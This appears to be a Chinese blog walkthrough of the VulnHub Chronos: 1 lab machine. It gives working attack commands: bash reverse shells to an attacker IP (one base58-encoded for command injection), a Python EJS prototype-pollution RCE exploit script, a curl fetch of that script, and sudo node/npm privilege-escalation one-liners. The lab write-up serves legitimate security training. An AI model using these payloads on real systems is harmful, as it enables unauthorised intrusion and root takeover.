VulnHub日记(十八):Chronos: 1

已于 2022-02-12 21:18:09 修改
阅读量3k 收藏 1
点赞数
分类专栏: VlunHub日记 文章标签: 安全
于 2022-02-12 21:17:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/122901552
版权

参考链接

Vulnhub:
参考博客
GTFOBins

开始练习

本机ip:192.168.56.102
目的机ip:192.168.56.126

fping -aqg 192.168.56.0/24

在这里插入图片描述
nmap 扫描主机

nmap -A -T4 -v 192.168.56.126

在这里插入图片描述

扫描目录无果,开放22,80和8000,访问
在这里插入图片描述

在这里插入图片描述
内容相似,bp抓包,发现参数format
在这里插入图片描述
将内容进行识别,可能是base64或base58
在这里插入图片描述
两个都测试后,是base58
在这里插入图片描述
bp去除参数,查看结果比较,猜测是date命令
在这里插入图片描述
使用pwd测试,确认可以rce
在这里插入图片描述

在这里插入图片描述
拼接获取webshell

&& bash -c 'bash -i >& /dev/tcp/192.168.56.102/4396 0>&1‘

base58编码

5ZUquXDzLaQ9v2JVGCs7yoNZW1yoG6jzAs7NYSJLVTF2XfF9FH3MnsGKCnp1cqZKA9M7QmAmv3iy5x

kali开启监听端口

nc -nvlp 4396

在这里插入图片描述

在这里插入图片描述
回退,有一个该应用的第二个版本,backend文件夹里有一个express-fileupload版本有已知漏洞可以提升权限
在这里插入图片描述
在这里插入图片描述

利用脚本原文链接

##############################################################
# Run this .py to perform EJS-RCE attack
# referenced from
# https://blog.p6.is/Real-World-JS-1/
# 
# Timothy, 10 November 2020
##############################################################

### imports
import requests

### commands to run on victim machine
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.102/4396 0>&1"'

print("Starting Attack...")
### pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

### execute command
requests.get('http://127.0.0.1:8080')
print("Finished!")

kali开启httpserver,webshell中使用wget或curl将脚本存入靶机

kali上:  python -m SimpleHTTPServer

cd /tmp
curl http://192.168.56.102:8000/exp1.py
./exp1.py

在这里插入图片描述
在这里插入图片描述
再开启一个监听端口,执行脚本,获取用户shell
在这里插入图片描述
在这里插入图片描述

sudo -l

在这里插入图片描述
尝试npm和node提权,node成功了

node部分

资料链接

sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'

在这里插入图片描述

npm部分

资料链接

TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i

在这里插入图片描述

FLAG

在这里插入图片描述

Dawn_Xiiii
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub:SUNSET-DAWN靶机
logan_logan的博客
06-06 486
1.在浏览器中输入目标靶机IP地址,浏览网页 2.端口扫描 发现开启了samba服务,接下来对samba服务进行枚举; nmap -p- 192.168.31.130 nmap -sC -sV -p 139,445,3306,12345 192.168.31.130 对samba服务枚举得时候发现了ITDEPT共享目录,不需要密码就可以登录 enum4linux -a -o 192.168.31.130 登录samba后,发现并没有文件存在,但是这个目录可以上传文件; smbclient
OSCP系列靶场-Esay-Dawn保姆级
杳若的博客
07-25 4223
OSCP系列靶场的保姆级别攻略
dawn靶场渗透测试
最新发布
qq_41567985的博客
11-13 261
dawn靶场渗透测试主要的利用点从主要的80端口转回到了445端口,通过逐渐的摸索发现445的共享文件夹,然后得到落脚点。解释:这个需要简历两个监听窗口,一个4444,一个5555 .4444用于通讯---然后把命令放入/bin/bash解释器---然后5555端口用于显示出执行后的消息。如果不使用nc -e 就像上面的代码一样,可能会出现反弹shell后执行命令没有回显,并且可能执行两三条命令后shell自动断开的情况。拿到flag—有两个flag,第一个我找了一下,没找到,应该是搞丢了,不过没关系。
dawn靶机打靶过程及思路
qq_52610024的博客
07-21 1254
5.执行mysql命令,sudo-uroot-p,输入之前命令历史内的hash破解之后的值,成功进入。6.利用find发现zsh具有root权限,输入zsh,zsh也具有root权限,成功得到root权限。3.针对3306端口的服务嗅探失败,针对80端口的目录发起扫描,发现日志里面存在一个。周期性的程序,创建一个相同名称的shell脚本,写入反弹shell的指令。4.成功突破边界进入系统,开始进行提权,首先查看命令历史,发现。符号中间没有信息,说明没有加盐,提示sudo-l命令。...
vulhub靶场之chronos靶场渗透全过程 :
weixin_62319197的博客
03-14 417
本文记录了对vulhub一个靶场的打靶拿到root权限全过程 内容比较基础。
VulnHub靶场】——CHRONOS: 1
热门推荐
Demo不是emo的博客
12-31 1万+
24次系统性打靶第三次训练,每次打靶后都会分享靶场攻略和总结的知识点
Chronos:chronos项目
05-03
时光 正在安装 打开命令行并运行此命令 npm install 近期变动 去做 此目录包含以下子目录... lib-包含核心scriptcraft模块和代码。 模块-包含供其他人使用的模块 插件-包含插件(在启动时自动加载并全局命名空间...
Chronos-VM-2:Chronos 虚拟机的新版本
07-03
1. **性能优化**:Chronos-VM-2 可能增强了JIT编译器,提高了代码执行速度,降低了内存占用,或者提升了多线程处理能力。 2. **类型系统增强**:可能会引入新的类型特性,如更强大的泛型支持,或者更好的类型检查...
nim-chronos:Chronos-一个高效的异步编程库
02-03
1. **Future和Promise**:`nim-chronos`的核心在于`Future`和`Promise`的概念,它们是异步操作的结果容器。`Promise`负责发起异步操作并将其结果存储在`Future`中。当异步操作完成时,`Future`可以通过回调或者`...
Chronos:Chronos-用于go语言的静态竞赛检测器
03-18
时光 Chronos是用Go语言编写的用于Go语言的静态竞赛检测器。快速开始:下载包go get -v github.com/amit-davidson/Chronos/cmd/chronos通过入口chronos --file <path> --mod 帮助Usage of ./chronos: --file string ...
chronos:Chronos是重量轻的时间和日期字符串操作功能
05-28
什么是Chronos? Chronos是一种轻量级的时间和日期字符串操作功能。 安装 npm i @hasala2002/chronos --save 然后... const chronos = require('@hasala2002/chronos'); let date = chronos.format('ddd-Mmm-yyy...
VulnHub靶场-Chronos
热爱学习,喜欢折腾!
06-11 852
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBoxBoot打开,从启动虚机到获取操作系统的root权限和查看flag。
vulnhub靶场——EvilBox-One
Czheisenberg的博客
03-04 4700
vulnhub靶场——EvilBox-One WP
Vulnhub靶机--Chronos
Tauil的博客
08-05 600
登录靶机页面,查看网络数据包,发现有两个数据包被拒绝了,查看到其IP显示为chronos.local,其回显仍然是靶机IP,所以需要修改 dns 指向,在本地 hosts 文件中将该网站进行自定义转向,输入命令。尝试将该参数进行解码,发现是base58编码,并且该语句后面衔接其他命令是可执行的,那么要是该网页输入参数没有进行替换或者过滤的话,便可以执行任意语句。发现该靶机还开了另外一个网络服务,在本地8080端口,而外网无法访问到,我们先找到该网络服务所在文件,发现在另一个版本的chronos-v2中。..
vulnhub靶机之dawn
timesleep的博客
12-05 900
首先确定我们的IP 我们的靶机IP为192.168.34.160 kali的IP为192.168.34.175 那我们首先扫描端口 1234这个端口是我们之前做的时候留下的 我们看到了有80这个端口我们访问一下 好我们扫一下目录 我们访问一下 我们发现了日志文件我们看一下 然后我们继续看靶机的其它端口如,139,445有没有可利用的 我们看到还有一个ITDEPT的共享目录我们去看一下发...
vulnhub靶场-Chronos
qq_42947816的博客
05-10 862
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
VnlnHub CHRONOS 1
weixin_45682839的博客
09-03 543
VnlnHub CHRONOS 1靶场通关攻略记录,涉及知识包括:端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用
VulnhubChronos:1 靶机实验
weixin_64112307的博客
06-30 974
EJS-RCE
Vulnhub系列--CHRONOS: 1
ch3cke的博客
03-31 4263
本次渗透测试我将使用cs来辅助进行渗透: 打点 主机存活发现: ┌──(kali㉿kali)-[~] └─$ nmap -sP 192.168.56.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:35 EDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or spec.
Capacity mismatch for disk D:\镜像\Vulnhub\Chronos\\Chronos-disk1
07-22
1. 检查文件大小:首先确认您的镜像文件或文件夹的大小是否与磁盘D的容量不匹配。您可以右键单击文件夹或文件,选择“属性”来查看其大小。如果文件夹或文件的大小与磁盘容量不相符,可能是因为存在其他隐藏文件、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值